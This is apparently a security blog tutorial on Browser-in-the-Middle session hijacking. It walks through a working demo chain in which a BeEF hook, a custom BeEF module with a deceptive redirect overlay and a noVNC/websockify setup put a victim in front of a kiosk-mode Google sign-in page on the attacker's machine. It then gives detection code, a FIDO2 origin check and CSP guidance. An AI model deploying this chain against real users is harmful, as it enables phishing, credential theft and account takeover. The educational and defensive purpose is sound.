Understanding Browser-in-the-Middle (BitM) Attacks
The Hidden Threat of Token Theft and Real-Time User Impersonation

Introduction
Session hijacking is one of the most critical threats in cybersecurity. In simple terms: when you log into a platform and complete MFA, the service issues a session token that your browser stores to keep you authenticated. If that token is stolen, the attacker can bypass your password and even MFA, because the session is already authenticated: they paste the token into their own browser and impersonate you. A Browser-in-the-Middle (BitM) attack is one way this is done.
What is a Browser-in-the-Middle attack?

BitM can be seen as an advanced form of the Man-in-the-Middle (MitM) attack. In a MitM attack, an attacker secretly intercepts or alters the communication between two parties. It works at the network level: if you are connected to an insecure or public network, an attacker on that same network can sit between you and the site you are trying to reach, sniff your data and hijack your session tokens. In a BitM attack, instead of just sitting in the middle and reading data, the attacker places a browser between you and the real website. It feels as if you are using your own browser, but the browser that actually talks to the site is running on the attacker's machine. Every action you take, including the authentication step, is mirrored and recorded by the attacker's tooling: keyloggers, web proxies, sniffers and even malicious browser extensions.
How a BitM Attack Unfolds
| Step | Description |
|---|---|
| Phishing Link | You receive a phishing link that leads to the attacker's server. |
| Attacker-Controlled Browser | When you click the link, you are routed through a real browser session running on the attacker's server, created with tools like noVNC. |
| Transparent Proxy | This browser is invisible to you and looks like the real site, but every action is monitored and manipulated by the attacker. |
| Data Capture Tools | The attacker uses web proxies, keyloggers and sniffers to capture your credentials, session tokens and even MFA codes. |
| Session Hijack | Once you authenticate, your session token is stolen and can be used by the attacker to impersonate you on the real site, so no password or MFA is needed. |
How a BitM attack takes place and why it is hard to detect
Browser-in-the-Middle (BitM) attacks are difficult to detect because they use legitimate tools and browser features, such as noVNC, VNC and the browser's kiosk mode, to build an authentic-looking and effectively invisible hijacking environment. VNC (Virtual Network Computing) lets one computer remotely control another's desktop. noVNC is a web-based VNC client that runs the remote session inside an ordinary browser using only HTML5 and JavaScript. In practice the attacker does the following:
They set up a VNC server on their infrastructure that runs a browser (such as Chrome or Firefox) in kiosk mode, a browser setting that runs the browser full-screen and hides all toolbars, the address bar and navigation buttons, so the victim never sees the real URL.
When the victim opens the link, the attacker's server responds by sending JavaScript (noVNC) to the victim's browser. That JavaScript opens a WebSocket connection back to the attacker's server.
The attacker uses websockify, a tool that bridges WebSocket traffic to plain TCP, to route this WebSocket traffic to the VNC server they already set up. The victim's browser is now unknowingly in a VNC session over WebSocket with the attacker's platform.
Using HTML5, the attacker serves a page that looks exactly like the site the victim intended to visit, while every action the victim takes is actually carried out in the browser on the attacker's server. Once the victim logs into the account, the session tokens can be stolen with tools such as Evilginx2.
BitM attacks are hard to detect because they use real browsers and real websites, and the tools above hide the usual warning signs. The victim's connection to the attacker's page is itself a valid HTTPS connection, so TLS raises no alarm and the protection users expect from HTTPS is bypassed as well.
The key differences between MitM and BitM attacks

MitM attacks rely on network-level manipulation and may require malware to be installed on the victim's device.
BitM attacks run a full browser session on the attacker's infrastructure, which makes detection harder because the victim sees a legitimate site and browser interface, whereas MitM attacks may trigger browser or security warnings if SSL/TLS is tampered with.

Building a BitM Attack Demo with noVNC, VNC, and BeEF
Let's build a phishing-like environment in which we (the attacker) run a browser on our own VNC server and expose it to the web with noVNC and websockify, showing a real login page. Then we use BeEF to hook a victim's browser and execute a payload that opens our custom noVNC page; when the victim opens it in a browser tab, that tab connects to the remote browser session and we can see everything the victim does.
First, install the required tools:
xfce4: lightweight desktop environment for our VNC session.
tigervnc-standalone-server: the VNC server.
novnc: the web-based VNC client.
websockify: bridges WebSocket (browser) traffic to VNC's TCP.
nginx: web server for an optional reverse proxy.
beef: Browser Exploitation Framework, used to hook the browser and execute the payload.
Set Up the VNC Server with a Browser
Start a VNC server with the XFCE desktop:

```shell
vncserver :2 -geometry 1280x800 -localhost no
```

:2 means display 2 (port 5902).
Then launch a browser on the display:

```shell
export DISPLAY=:1
firefox --kiosk https://accounts.google.com/signin &
```

To view the XFCE desktop after launching the browser, connect to the running VNC session with a VNC client. For that I installed the TigerVNC Viewer client.
Once it was installed I opened it and connected to the IP of my host machine.
In the VNC viewer, enter your IP address followed by :1 (display 1, which corresponds to port 5901, where the VNC server is running).

Once the connection succeeds we land inside the XFCE desktop environment running inside a TigerVNC Viewer window, as shown in the image below.

Set Up noVNC and websockify
Now start websockify to serve noVNC and proxy to the VNC server:

```shell
websockify --web /usr/share/novnc/ 6080 localhost:5901
```

6080 is the port for browser access, localhost:5901 is the VNC server, and /usr/share/novnc/ is our noVNC install path. Then open the noVNC page in the browser.
Hook the browser and execute the payload
Once we have cloned BeEF and installed all its dependencies, start it:

```shell
./beef
```

As BeEF starts, the terminal prints the BeEF hook URL; note it down. It looks like this:

```html
<script src="http://<your IP>:3000/hook.js"></script>
```

The BeEF UI is reached at http://localhost:3000/ui/panel in our browser. Create an HTML file mimicking a login or landing page that includes the hook script, and serve it with Python's built-in HTTP server. The malicious page will be available at:
http://<ip>:8080/malicious_page.html
Now when you open this page in the browser, the page loads and the browser is "hooked" by BeEF. In the BeEF GUI you will see:
the hooked browser under "Online Browsers" (left panel)
browser details such as the OS and browser type.

Create a Custom BeEF Module (noVNC Redirect)
In your terminal, navigate to the BeEF modules directory, create a new module folder and add the module configuration file config.yaml with the following content:

```yaml
beef:
  module:
    novnc_redirect:
      enable: true
      category: "Exploitation"
      name: "noVNC Redirect Attack"
      description: "Redirects victim browser to attacker's noVNC session"
      authors: ["YourName"]
      target:
        working: ["ALL"]
```

Now create the Ruby module file module.rb with this content:

```ruby
class Novnc_redirect < BeEF::Core::Command
  def self.options
    [
      {'name' => 'novnc_url', 'ui_label' => 'noVNC URL', 'value' => 'http://192.168.29.150:6080/vnc.html'},
      {'name' => 'delay', 'ui_label' => 'Delay (seconds)', 'value' => '3'}
    ]
  end

  def post_execute
    content = {}
    content['result'] = @datastore['result']
    save content
  end
end
```

After this, create the JavaScript payload:

```javascript
beef.execute(function() {
  var novnc_url = '<%= @novnc_url %>';
  var delay = parseInt('<%= @delay %>') * 1000;

  setTimeout(function() {
    // Create overlay to hide the redirection
    var overlay = document.createElement('div');
    overlay.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;background:#fff;z-index:9999;text-align:center;padding-top:200px;font-family:Arial;';
    overlay.innerHTML = '<h2>Redirecting to secure session...</h2><p>Please wait...</p>';
    document.body.appendChild(overlay);

    // Open noVNC in new window/tab
    setTimeout(function() {
      window.open(novnc_url, '_blank', 'fullscreen=yes,menubar=no,toolbar=no,location=no,status=no');
      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=noVNC session opened successfully');
    }, 1000);
  }, delay);
});
```

Execute the attack
Restart BeEF to load the new module. In the BeEF UI, select the hooked browser under "Online Browsers" and go to the Commands tab. When you execute the module, the browser is redirected to the noVNC page and prompted for a password, because the VNC server is password-protected. To make the attack seamless and avoid showing that prompt, the password can be passed in the URL so that noVNC auto-connects:

```
http://:6080/vnc.html?autoconnect=true&password=YOURVNCPASSWORD
```

The victim's browser (the one open on your fake login page) is redirected to the noVNC page.
If everything is set up correctly, they will see your XFCE desktop streamed into their browser via noVNC.


Here we can observe that a remote desktop (the attacker's XFCE4 desktop) has been opened inside the victim's browser!
Detection Techniques: How to Identify and Prevent BitM
Detecting a BitM attack is challenging because the attacker operates within the user's own browser session, which makes their presence nearly invisible to traditional monitoring tools.
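One place where the demo above does leave a trace is the web proxy or gateway log. The following is an added example (not from the original post) that scans constructed log lines for the artifacts of that setup: websockify's port 6080, noVNC's client pages and websockify endpoint, a BeEF hook.js load, and a VNC password passed in the URL. Log format, hosts and the 198.51.100.7 address are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log lines: "<client> <method> <url> <status> [upgrade:websocket]"
SAMPLE_LOG = """\
10.0.0.5 GET https://accounts.google.com/signin 200
10.0.0.5 GET http://198.51.100.7:8080/malicious_page.html 200
10.0.0.5 GET http://198.51.100.7:3000/hook.js 200
10.0.0.5 GET http://198.51.100.7:6080/vnc.html?autoconnect=true&password=s3cret 200
10.0.0.5 GET http://198.51.100.7:6080/websockify 101 upgrade:websocket
10.0.0.9 GET https://intranet.example/dashboard 200
"""

# Artifacts of the noVNC/websockify/BeEF chain described in the post.
NOVNC_PORTS = {6080}                                   # websockify's usual listening port
NOVNC_PATHS = re.compile(r"/(vnc(_lite)?\.html|websockify)$")  # noVNC client pages, ws endpoint
BEEF_HOOK = re.compile(r"/hook\.js$")                  # BeEF's hook script

def classify(line):
    """Return the reasons a log line looks like BitM tooling (empty list if clean)."""
    parts = line.split()
    if len(parts) < 4:
        return []
    u = urlsplit(parts[2])
    reasons = []
    if u.port in NOVNC_PORTS:
        reasons.append("noVNC/websockify port")
    if NOVNC_PATHS.search(u.path):
        reasons.append("noVNC client path")
    if BEEF_HOOK.search(u.path):
        reasons.append("BeEF hook script")
    query = parse_qs(u.query)
    if "password" in query:
        reasons.append("credential in URL")       # the autoconnect trick from the post
    if "autoconnect" in query:
        reasons.append("noVNC autoconnect")
    if "upgrade:websocket" in parts and reasons:
        reasons.append("websocket upgrade to suspicious endpoint")
    return reasons

def scan(log_text):
    """Map each suspicious log line to the list of reasons it was flagged."""
    flagged = {}
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            flagged[line] = reasons
    return flagged
```

Port and path matching alone will produce false positives in environments that run noVNC legitimately; the credential-in-URL and hook.js signals are the stronger ones.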
Prevention methods:
Use hardware security keys such as FIDO2
FIDO2 security keys are small physical devices, often USB or Bluetooth, that act as a second layer of security when logging into your accounts. A FIDO2 key will not work unless it verifies two things:
that you are physically present (by requiring a touch or tap)
that the website you are logging into is genuine (by checking the domain).
When you try to log in, your FIDO2 key checks whether the website address (URL) is genuine. If an attacker tricks you into visiting a fake page, the FIDO2 key refuses to authenticate because the domain is incorrect.
The FIDO2 key generates a unique cryptographic signature that is only valid for the real site. So even if a BitM attacker intercepts your session, they cannot reuse the login: they would have to fool the key, which they cannot.
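The domain check described above is enforced on both ends: the authenticator signs over the origin the browser reports, and the relying party rejects any assertion whose origin or rpIdHash is not its own. The example below is added here (it is not from the original post) and shows the relying-party side of that check with constructed clientDataJSON and authenticatorData; the RP ID accounts.example, the phishing origin and the omission of signature verification are assumptions for illustration.

```python
import base64
import hashlib
import json
from typing import Tuple

# Relying-party settings (assumed values for this example).
RP_ID = "accounts.example"
EXPECTED_ORIGIN = "https://accounts.example"

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def make_client_data(origin: str, challenge: bytes) -> bytes:
    """Constructed clientDataJSON as the browser would build it for an assertion.
    The browser, not the page, fills in 'origin', so a phishing page cannot lie here."""
    return json.dumps({"type": "webauthn.get",
                       "challenge": b64url(challenge),
                       "origin": origin}).encode()

def make_authenticator_data(rp_id: str) -> bytes:
    """Constructed authenticatorData: SHA-256(rpId) || flags || signCount."""
    flags = b"\x05"                       # UP (user present) and UV (user verified)
    sign_count = (1).to_bytes(4, "big")
    return hashlib.sha256(rp_id.encode()).digest() + flags + sign_count

def verify_assertion(client_data: bytes, auth_data: bytes,
                     challenge: bytes) -> Tuple[bool, str]:
    """The WebAuthn checks that defeat a phished or proxied login: fresh challenge,
    exact origin match and rpIdHash match. Signature verification over
    authData || SHA-256(clientDataJSON) would follow and is omitted here."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if cd.get("challenge") != b64url(challenge):
        return False, "challenge mismatch (replay or wrong session)"
    if cd.get("origin") != EXPECTED_ORIGIN:
        return False, f"origin {cd.get('origin')!r} is not {EXPECTED_ORIGIN!r}"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash does not match this relying party"
    if not auth_data[32] & 0x01:
        return False, "user presence flag not set"
    return True, "ok"
```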
Runtime Application Self-Protection
Runtime Application Self-Protection (RASP) is a security technology built into the application itself. Unlike traditional controls such as firewalls or antivirus that sit outside, RASP operates from inside the application while it is running: it monitors the application's behaviour in real time and can block malicious actions as they occur.
Enforcing trusted script execution in the browser
We can restrict which JavaScript is allowed to run in the browser with a Content Security Policy (CSP), a security header that defines trusted sources for content. A strict CSP for script execution ensures that only scripts explicitly tagged by the server can execute, which mitigates the risk of malicious inline scripts injected via BitM.
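To make "scripts explicitly tagged by the server" concrete, the added example below (not from the original post) builds a nonce-based script-src policy, places a permissive policy next to it, and evaluates whether a given script would run under each. It is a simplified CSP evaluator: hash sources and host-list matching are not modelled, and the page origin and the hook.js URL are assumed values.

```python
import secrets
from typing import Optional

def fresh_nonce() -> str:
    """Per-response nonce; the server puts it in the header and on every script
    tag it emits, so a script injected later cannot know it."""
    return secrets.token_urlsafe(16)

def build_csp(nonce: str) -> str:
    """Strict policy: only scripts tagged with this nonce (and scripts those
    load, via 'strict-dynamic') may execute; plugins and <base> are disabled."""
    return (f"script-src 'nonce-{nonce}' 'strict-dynamic'; "
            "object-src 'none'; base-uri 'none'")

# Permissive policy for comparison: inline scripts and any http:/https: host allowed.
WEAK_CSP = "script-src 'self' 'unsafe-inline' http: https:"

def parse_script_src(csp: str) -> set:
    """Return the source expressions of the script-src directive (empty if absent)."""
    for directive in csp.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name == "script-src":
            return set(value.split())
    return set()

def script_allowed(csp: str, src: Optional[str] = None, nonce: Optional[str] = None,
                   page_origin: str = "https://accounts.example") -> bool:
    """Decide whether a script executes: src=None means an inline script."""
    srcs = parse_script_src(csp)
    if not srcs:
        return True                                   # no script-src: unrestricted
    if nonce is not None and f"'nonce-{nonce}'" in srcs:
        return True                                   # server-tagged script
    if src is None:                                   # inline without a valid nonce
        has_nonce_source = any(s.startswith("'nonce-") for s in srcs)
        return "'unsafe-inline'" in srcs and not has_nonce_source  # CSP ignores it then
    if "'self'" in srcs and src.startswith(page_origin + "/"):
        return True
    return src.split(":", 1)[0] + ":" in srcs         # scheme-source match, e.g. http:
```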